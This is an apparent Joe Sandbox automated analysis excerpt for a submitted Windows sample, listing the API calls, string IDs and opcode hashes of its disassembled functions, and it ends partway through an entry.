                                                                                                                    • Opcode ID: 6ba7263ec1b5e05a899a7cb90cdcde9fcfc404ee39274f2161897450b68def73
                                                                                                                    • Instruction ID: 50efa25f494aa2e56bd5b6f87639344b32a47e79fa1af934457103996d545ebf
                                                                                                                    • Opcode Fuzzy Hash: 6ba7263ec1b5e05a899a7cb90cdcde9fcfc404ee39274f2161897450b68def73
                                                                                                                    • Instruction Fuzzy Hash: BF515F71B10205AFDB19CFA9DD9AAAEBBBAEB88310F54822DF515D72D0D7749D008B10
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B2036,?,00000000,?,?,?,?,002B16CB,00000000,?), ref: 002B1B9A
                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002B20D3
                                                                                                                    • KillTimer.USER32(-00000001,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002B216E
                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 002EBCA6
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBCD7
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBCEE
                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002B16CB,00000000,?,?,002B1AE2,?,?), ref: 002EBD0A
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002EBD1C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 641708696-0
                                                                                                                    • Opcode ID: 63cdc2c95e44a29a069e8cbe7fa7bb1e9eb7b4df545ebebac091805811f966cb
                                                                                                                    • Instruction ID: 6a1976610e5a3d72893b4a4d51ec067dc5e00fcad1f083d71c9dedbf73dae6bb
                                                                                                                    • Opcode Fuzzy Hash: 63cdc2c95e44a29a069e8cbe7fa7bb1e9eb7b4df545ebebac091805811f966cb
                                                                                                                    • Instruction Fuzzy Hash: 3A619F30630B41EFCB3AAF19CD88B6677F5FB50352F908829E4465A570C7B0A8A5DF51
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B25DB: GetWindowLongW.USER32(?,000000EB), ref: 002B25EC
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002B21D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ColorLongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 259745315-0
                                                                                                                    • Opcode ID: c10453f0865b379a39e07a1fcf51a954c967e7097c1f5044edc087946144e519
                                                                                                                    • Instruction ID: 584f6cb6bab797ce27d1a637aee67e1bac86b8546e09b81ff28b0131eb9da08f
                                                                                                                    • Opcode Fuzzy Hash: c10453f0865b379a39e07a1fcf51a954c967e7097c1f5044edc087946144e519
                                                                                                                    • Instruction Fuzzy Hash: E141F130410245EFDB265F28EC88BF93B69EB06371F584265FEA5CA1E2C7718C56DB21
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,0033F910), ref: 0031A90B
                                                                                                                    • GetDriveTypeW.KERNEL32(00000061,003689A0,00000061), ref: 0031A9D5
                                                                                                                    • _wcscpy.LIBCMT ref: 0031A9FF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                    • API String ID: 2820617543-1000479233
                                                                                                                    • Opcode ID: c86a38054b117c3713fe8792912e4f78e663d5828565c01d30fc4ef6ffd7afbe
                                                                                                                    • Instruction ID: f8bbc0a142c4d415aa9fde6274562ad6c20073e95c9ed4aa7c6dd246bb89ed1d
                                                                                                                    • Opcode Fuzzy Hash: c86a38054b117c3713fe8792912e4f78e663d5828565c01d30fc4ef6ffd7afbe
                                                                                                                    • Instruction Fuzzy Hash: EB51BE311283019FC30AEF14C892AEFB7E9EF88341F05492DF595572A2DB319D99CA53
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __i64tow__itow__swprintf
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 421087845-2263619337
                                                                                                                    • Opcode ID: 4680dcd53d02661639ef97c55424f29d517f4ae512e6475ad7a78f313659175d
                                                                                                                    • Instruction ID: 61c43df24cebee7bf54b5e76dabfed8a333738cff0daa8fbe75056d274673c79
                                                                                                                    • Opcode Fuzzy Hash: 4680dcd53d02661639ef97c55424f29d517f4ae512e6475ad7a78f313659175d
                                                                                                                    • Instruction Fuzzy Hash: 48411571530206AFDB24DF35C942EBA73E9FF46340F6044AEE549DB292EA719D61CB10
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0033716A
                                                                                                                    • CreateMenu.USER32 ref: 00337185
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00337194
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00337221
                                                                                                                    • IsMenu.USER32(?), ref: 00337237
                                                                                                                    • CreatePopupMenu.USER32 ref: 00337241
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0033726E
                                                                                                                    • DrawMenuBar.USER32 ref: 00337276
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                    • String ID: 0$F
                                                                                                                    • API String ID: 176399719-3044882817
                                                                                                                    • Opcode ID: 502f9f2fd70eda0b20167d28ed2b5fc1f08434b979d9fa1fae61b5600c0ca30d
                                                                                                                    • Instruction ID: 6a21a14f16b801a1f810a5637eb7130e81ccfb0636c9ede70620d05ce29d614e
                                                                                                                    • Opcode Fuzzy Hash: 502f9f2fd70eda0b20167d28ed2b5fc1f08434b979d9fa1fae61b5600c0ca30d
                                                                                                                    • Instruction Fuzzy Hash: 7C4177B5A01209EFEB22DFA4D884F9ABBB9FF09311F150428F945A7360D731A910CF90
                                                                                                                    APIs
                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0033755E
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00337565
                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00337578
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00337580
                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0033758B
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00337594
                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0033759E
                                                                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003375B2
                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003375BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                    • String ID: static
                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                    • Opcode ID: 234ca76f15619aba213570365bb16b5ed5fa31afa388479c53c96e5ecb05218f
                                                                                                                    • Instruction ID: 567c711b97298197f372b117f8eabee360a6a697a3c2d05712a521401f598406
                                                                                                                    • Opcode Fuzzy Hash: 234ca76f15619aba213570365bb16b5ed5fa31afa388479c53c96e5ecb05218f
                                                                                                                    • Instruction Fuzzy Hash: CD316A72505215BFEF269F64DC89FEA3B6DEF0A361F110224FA15A60A0C735D821DBA4
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002D6E3E
                                                                                                                      • Part of subcall function 002D8B28: __getptd_noexit.LIBCMT ref: 002D8B28
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6ED7
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6F0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 002D6F2A
                                                                                                                    • __allrem.LIBCMT ref: 002D6F80
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D6F9C
                                                                                                                    • __allrem.LIBCMT ref: 002D6FB3
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D6FD1
                                                                                                                    • __allrem.LIBCMT ref: 002D6FE8
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002D7006
                                                                                                                    • __invoke_watson.LIBCMT ref: 002D7077
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction ID: c829cda6d755b9f4228ce525a6ac666f6e13e6f906c6519b7a0464a7c0d40a17
                                                                                                                    • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                    • Instruction Fuzzy Hash: 8471F372A60B17ABD714EE69DC45B6AB3A8AF14320F14822BF514D73C1F774DD608B90
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00312542
                                                                                                                    • GetMenuItemInfoW.USER32(00375890,000000FF,00000000,00000030), ref: 003125A3
                                                                                                                    • SetMenuItemInfoW.USER32(00375890,00000004,00000000,00000030), ref: 003125D9
                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 003125EB
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0031262F
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0031264B
                                                                                                                    • GetMenuItemID.USER32(?,-00000001), ref: 00312675
                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 003126BA
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00312700
                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312714
                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00312735
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4176008265-0
                                                                                                                    • Opcode ID: 80f8e85f4029a350202fc5524fdea33c12afb61f105e47f6e58e6d2fd626637c
                                                                                                                    • Instruction ID: fac4b71cce8dffa47b74b23656ec2bea2c10079079c92e7e11cc39c7187a9d3c
                                                                                                                    • Opcode Fuzzy Hash: 80f8e85f4029a350202fc5524fdea33c12afb61f105e47f6e58e6d2fd626637c
                                                                                                                    • Instruction Fuzzy Hash: 85619D70900249AFDB2BCF64CC88DEFBBB9EB0A304F550459E841A7291D771ADA5DB20
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00336FA5
                                                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00336FA8
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00336FCC
                                                                                                                    • _memset.LIBCMT ref: 00336FDD
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00336FEF
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00337067
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow_memset
                                                                                                                    • String ID:
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00306BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00306C18
• VariantInit.OLEAUT32(?), ref: 00306C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00306C4A
• VariantCopy.OLEAUT32(?,?), ref: 00306C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00306CB1
• VariantClear.OLEAUT32(?), ref: 00306CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00306CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00306CDC
• VariantClear.OLEAUT32(?), ref: 00306CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00306CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00325793
• inet_addr.WSOCK32(?,?,?), ref: 003257D8
• gethostbyname.WSOCK32(?), ref: 003257E4
• IcmpCreateFile.IPHLPAPI ref: 003257F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00325862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00325878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 003258ED
• WSACleanup.WSOCK32 ref: 003258F3
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0031B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0031B546
• GetLastError.KERNEL32 ref: 0031B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0031B5BD
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
APIs
  • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
  • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00309014
• GetDlgCtrlID.USER32 ref: 0030901F
• GetParent.USER32 ref: 0030903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0030903E
• GetDlgCtrlID.USER32(?), ref: 00309047
• GetParent.USER32(?), ref: 00309063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00309066
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
APIs
  • Part of subcall function 002B7DE1: _memmove.LIBCMT ref: 002B7E22
  • Part of subcall function 0030AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0030AABC
• SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003090FD
• GetDlgCtrlID.USER32 ref: 00309108
• GetParent.USER32 ref: 00309124
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00309127
• GetDlgCtrlID.USER32(?), ref: 00309130
• GetParent.USER32(?), ref: 0030914C
• SendMessageW.USER32(00000000,?,?,00000111), ref: 0030914F
Similarity
• API ID: MessageSend$CtrlParent$ClassName_memmove
• String ID: ComboBox$ListBox
APIs
• GetParent.USER32 ref: 0030916F
• GetClassNameW.USER32(00000000,?,00000100), ref: 00309184
• _wcscmp.LIBCMT ref: 00309196
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00309211
Similarity
• API ID: ClassMessageNameParentSend_wcscmp
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00317A6C
Similarity
• API ID: ArraySafeVartype
• String ID:
APIs
• GetCurrentThreadId.KERNEL32 ref: 003111F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00310268,?,00000001), ref: 00311204
• GetWindowThreadProcessId.USER32(00000000), ref: 0031120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 0031121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0031122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00310268,?,00000001), ref: 00311257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 0031129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00310268,?,00000001), ref: 003112BC
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 625cdfe0e5620f2381c574c1a88d557e5aba2dd815e8542160aeb5ff340ff30b
• Instruction ID: 8001f555d9b22c75c9d18ce42a204373da210dbab9df2ae98c0207c8dc2f823b
• Opcode Fuzzy Hash: 625cdfe0e5620f2381c574c1a88d557e5aba2dd815e8542160aeb5ff340ff30b
• Instruction Fuzzy Hash: DE31F075A00A08BFDB279F50EC8AFEA37ADEB58311F114525FE08C61A0D3B09DC18B60
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002BFAA6
• OleUninitialize.OLE32(?,00000000), ref: 002BFB45
• UnregisterHotKey.USER32(?), ref: 002BFC9C
• DestroyWindow.USER32(?), ref: 002F45D6
• FreeLibrary.KERNEL32(?), ref: 002F463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 002F4668
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: 50ab722c21ef4fc7172b436439359c43f7b79f1a2449df7d6ee382bb8efc2b08
• Instruction ID: 8668cebad4637b78c25fdf8f72cbec1678019659034bc1a94163345b63249aa0
• Opcode Fuzzy Hash: 50ab722c21ef4fc7172b436439359c43f7b79f1a2449df7d6ee382bb8efc2b08
• Instruction Fuzzy Hash: F3A18030721116CFCB19EF14C995BBAF764AF05780F5442BDE90AAB261DB70AD62CF50
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: Variant$ClearInit$_memset
• String ID: ,,4$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2862541840-687562478
• Opcode ID: 7d95474d9327d0521f0a6348bf2e247584bb3f8510197b972745f3d96738a716
• Instruction ID: 0cf9fb7e4df2cfe8c57d4bf4316b112bf5f443fa6c6592d2369cb392f7434e48
• Opcode Fuzzy Hash: 7d95474d9327d0521f0a6348bf2e247584bb3f8510197b972745f3d96738a716
• Instruction Fuzzy Hash: 23919271E00229EBDF25CFA5D848FAEB7B8EF45710F10855AF515AB280D7709945CFA0
APIs
• EnumChildWindows.USER32(?,0030A439), ref: 0030A377
Strings
Memory Dump Source
• Source File: 00000000.00000002.2093337129.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
• Associated: 00000000.00000002.2093280237.00000000002B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.000000000033F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093420472.0000000000364000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093476420.000000000036E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2093514337.0000000000377000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2b0000_6BRa130JDj.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: f6b5e680437ebd5fa6c63dc81d4f47c1ae2923d4b0a218a91ec9d47cd70a4f90
• Instruction ID: 8532179e92f327f51cebb7636db636dbf3983805d7c9a9b556ae5de8e83b3927
